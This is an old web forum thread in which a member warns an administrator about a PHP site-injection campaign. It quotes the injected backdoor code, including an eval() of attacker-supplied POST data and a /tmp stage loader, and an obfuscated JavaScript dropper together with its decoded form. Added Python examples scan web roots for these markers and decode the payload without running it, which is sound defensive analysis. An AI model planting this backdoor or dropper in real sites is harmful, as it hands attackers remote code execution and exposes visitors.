Author Topic: Dear Chocadmin & all  (Read 2686 times)

netbuddy
  • Full Member
  • Posts: 786
  • Karma: -1
  • Death by Chocolate Survivor.
Dear Chocadmin & all
« on: December 09, 2008, 01:07:41 am »
You may want to consider blocking two IP addresses in your firewall settings.

A Chinese guy -> http://samspade.org/whois/218.93.202.61
A Russian guy -> http://samspade.org/whois/78.110.175.21

There's a website hacking script that people are being hit with. It is particularly nasty in so far as the PHP script takes ownership of the files on the server and inserts into each file it finds a short JavaScript that gets executed on the recipient's PC when that page is called.

This is some sort of dropper that will download malware to your PC.

As this is an attack launched through PHP and web forms, a web forum is a likely target, so you may want to beware and take any precautions that you can.

If any of your PHP site scripts get compromised and lines like these appear in your PHP scripts, then you have been hit.
Code:
// Injected loader: tries /tmp/m1 .. /tmp/m99 and include_once()s the first one that exists
if(!function_exists('tmp_lkojfghx')){
    for($i=1;$i<100;$i++)
        if(is_file($f='/tmp/m'.$i))
        {
            include_once($f);
            break;
        }

    // Backdoor: runs whatever PHP the attacker sends in the tmp_lkojfghx3 POST field
    if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
    if(!defined('TMP_XHGFJOKL'))
    // (the quoted snippet ends here; the rest of the injected block is not included in the post)

Keep 'em peeled folks.
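An added example, not part of the original post: a small scanner that walks a web root looking for the markers of the injected block quoted above (the loader function name, the guard constant, the /tmp/m1..m99 include loop, and, more generically, any eval() of request data) and that checks for dropped stage files under /tmp, which is where the loader looks for them. The sample web root and the fake /tmp it scans are constructed inline for the demonstration; the signature names and the helper functions are my own, not anything from the forum or SMF.

```python
import os
import re
import tempfile

# Markers taken from the injected PHP quoted in the post. The loader function
# name and the define() constant are specific to this campaign; the last
# pattern is a generic "eval() of request data" check that also catches
# variants that rename the POST field.
SIGNATURES = {
    "loader-name": re.compile(r"tmp_lkojfghx"),
    "guard-constant": re.compile(r"TMP_XHGFJOKL"),
    "tmp-stage-include": re.compile(r"is_file\(\s*\$f\s*=\s*'/tmp/m'\s*\.\s*\$i\s*\)"),
    "eval-of-request": re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\["),
}

PHP_EXTENSIONS = (".php", ".php3", ".php4", ".php5", ".phtml", ".inc")


def scan_file(path):
    """Return the names of the signatures found in one file (empty list if clean)."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return [name for name, pattern in SIGNATURES.items() if pattern.search(text)]


def scan_tree(root):
    """Walk a web root; map each matching PHP file (relative path) to its signature names."""
    hits = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for filename in filenames:
            if not filename.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, filename)
            found = scan_file(path)
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits


def find_tmp_stages(tmp_dir="/tmp"):
    """List /tmp/m1 .. /tmp/m99: the loader include_once()s the first one that exists."""
    return [
        os.path.join(tmp_dir, "m%d" % i)
        for i in range(1, 100)
        if os.path.isfile(os.path.join(tmp_dir, "m%d" % i))
    ]


# Constructed sample files (not from any real server): one clean page and one
# carrying the injected block from the post. The post's excerpt stops mid-block,
# so the sample is padded with an empty body and a closing brace to be whole PHP.
CLEAN_PHP = "<?php\necho 'hello';\n"
INFECTED_PHP = (
    "<?php if(!function_exists('tmp_lkojfghx')){\n"
    "for($i=1;$i<100;$i++)\n"
    "if(is_file($f='/tmp/m'.$i))\n"
    "{\n"
    "include_once($f);\n"
    "break;\n"
    "}\n"
    "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);\n"
    "if(!defined('TMP_XHGFJOKL')) { /* tail not quoted in the post */ }\n"
    "}\n?>\n<html><body>forum</body></html>\n"
)


def build_sample_webroot():
    """Create a throwaway web root (clean + infected page) and a fake /tmp with one stage file."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "forum"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(CLEAN_PHP)
    with open(os.path.join(root, "forum", "index.php"), "w") as fh:
        fh.write(INFECTED_PHP)
    with open(os.path.join(root, "readme.txt"), "w") as fh:
        fh.write(INFECTED_PHP)  # non-PHP extension: deliberately skipped by scan_tree
    fake_tmp = tempfile.mkdtemp(prefix="faketmp-")
    with open(os.path.join(fake_tmp, "m3"), "w") as fh:
        fh.write("<?php /* constructed stand-in for a dropped stage file */\n")
    return root, fake_tmp


if __name__ == "__main__":
    root, fake_tmp = build_sample_webroot()
    for path, names in scan_tree(root).items():
        print("INFECTED", path, ", ".join(names))
    for stage in find_tmp_stages(fake_tmp):
        print("STAGE", stage)
    # On a real box: scan_tree("/var/www") and find_tmp_stages("/tmp")
```

The campaign-specific names are the quickest check but the weakest one, since a reworked script will rename them; the eval-of-request pattern is the one worth keeping in a routine scan, and a hit on it in a file you did not write is reason enough to pull the box off the network and compare against a known-good copy of the site.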

chocadmin
  • Administrator
  • Full Member
  • Posts: 880
  • Karma: 66
Re: Dear Chocadmin & all
« Reply #1 on: December 09, 2008, 10:26:11 pm »
Many thanks, will look at blocking those ranges.
I have my fingers crossed that SMF (the forum software) will keep updating to stop any security issues. It's the only bit of PHP on the site (apart from the stuff I'm toying with for Facebook).

netbuddy
  • Full Member
  • Posts: 786
  • Karma: -1
  • Death by Chocolate Survivor.
Re: Dear Chocadmin & all
« Reply #2 on: December 13, 2008, 10:21:53 pm »
Well I managed to extract the payload from one server, the other one seems to be unresponsive.

Code:
// Blanks the src of the elements with ids _0_ .. _8_, then strips the noise characters
// (@ ! ~ ? # $ ` |) from the string, unescape()s it and eval()s the result
_=0;for(i=0;i<9;i++){var d=document.getElementById("_"+i+"_");if(d)d.src=""}eval(unescape('`/!%2F~Ju|%73t`%20f`%75ck `of@f.%2E%2E!�%3C@%64#%69#%76` @s!%74#%79l~e$%3D|%64!i!s@%70@%6C~ay!:no$%6E@%65%3E\nv%61@r $%74%3D%6E$ew%20%44%61te$%28@%31`2|2%39%33035!9%320`0$0|)$%3B%64~%6F%63u#%6D|%65#%6E%74%2E#c!%6F`o`%6B%69%65="!%68|gft`%3D!1|;%20~%65x@p@i$r%65!%73#%3D`"+%74%2Et~oG#%4D%54`%53@t#r%69`n$g#%28$)!%2B%22#%3B# p|%61%74h=/%22;#\n%2F/#%3C$/d~%69%76%3E').replace(/@|\!|~|\?|#|\$|`|\|/g,""));
This is then run and turns into:
Code:
//Just *uck off...<div style=display:none>
var t=new Date(1229301882000);document.cookie="hgft=1; expires="+t.toGMTString()+"; path=/";
//</div>
This IMHO is very childish and says to me that this is very likely a dry run for something else. Let's look at this from a logistics point of view: you do not break a server to then poison people's machines with an empty cookie!?! So this has to be a test run, as it only involves 2 servers, and in the script I can see that the script is designed to handle 10 servers.
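An added example, not code from the post: a Python decoder that does what the payload's own eval(unescape(...).replace(...)) line does, minus the eval, so the dropper can be read without running it. The noise-stripping regex is transcribed from the payload; js_unescape() is my own re-implementation of JavaScript's unescape() (%XX and %uXXXX), because Python's urllib.parse.unquote does not handle %uXXXX. The obfuscated string below is the one quoted above, except that one character the page shows as an unreadable replacement glyph is assumed to be '?', which is one of the characters the payload's regex deletes anyway. Note that this copy decodes to a different cookie expiry timestamp than the decoded text quoted in the post, so the obfuscated and decoded copies were presumably captured from separate fetches.

```python
import re
from datetime import datetime, timezone

# The payload's own de-noising step, transcribed from the eval() line in the post:
# the characters @ ! ~ ? # $ ` and | are deleted before unescape() runs.
NOISE = re.compile(r"[@!~?#$`|]")

# JavaScript unescape(): %uXXXX and %XX become code points, everything else stays.
_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s):
    """Re-implementation of JavaScript's unescape()."""
    return _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_payload(obfuscated):
    """Strip the noise characters and unescape, exactly as the dropper does, without eval."""
    return js_unescape(NOISE.sub("", obfuscated))


def cookie_expiry(decoded):
    """Return the new Date(<epoch ms>) argument from the decoded script as a UTC datetime."""
    m = re.search(r"new Date\((\d+)\)", decoded)
    if not m:
        return None
    return datetime.fromtimestamp(int(m.group(1)) / 1000, tz=timezone.utc)


# The string passed to unescape() in the post (one unreadable character assumed to be '?').
OBFUSCATED = (
    '`/!%2F~Ju|%73t`%20f`%75ck `of@f.%2E%2E!?%3C@%64#%69#%76` @s!%74#%79l~e$%3D'
    '|%64!i!s@%70@%6C~ay!:no$%6E@%65%3E\nv%61@r $%74%3D%6E$ew%20%44%61te$%28@%31'
    '`2|2%39%33035!9%320`0$0|)$%3B%64~%6F%63u#%6D|%65#%6E%74%2E#c!%6F`o`%6B%69%65'
    '="!%68|gft`%3D!1|;%20~%65x@p@i$r%65!%73#%3D`"+%74%2Et~oG#%4D%54`%53@t#r%69`n'
    '$g#%28$)!%2B%22#%3B# p|%61%74h=/%22;#\n%2F/#%3C$/d~%69%76%3E'
)


if __name__ == "__main__":
    clear = decode_payload(OBFUSCATED)
    print(clear)
    print("cookie expires:", cookie_expiry(clear).isoformat())
```

The same two functions work on any later sample that keeps this obfuscator: replace OBFUSCATED with the string from the new eval(unescape(...)) line and, if the noise alphabet in the .replace() regex has changed, update NOISE to match.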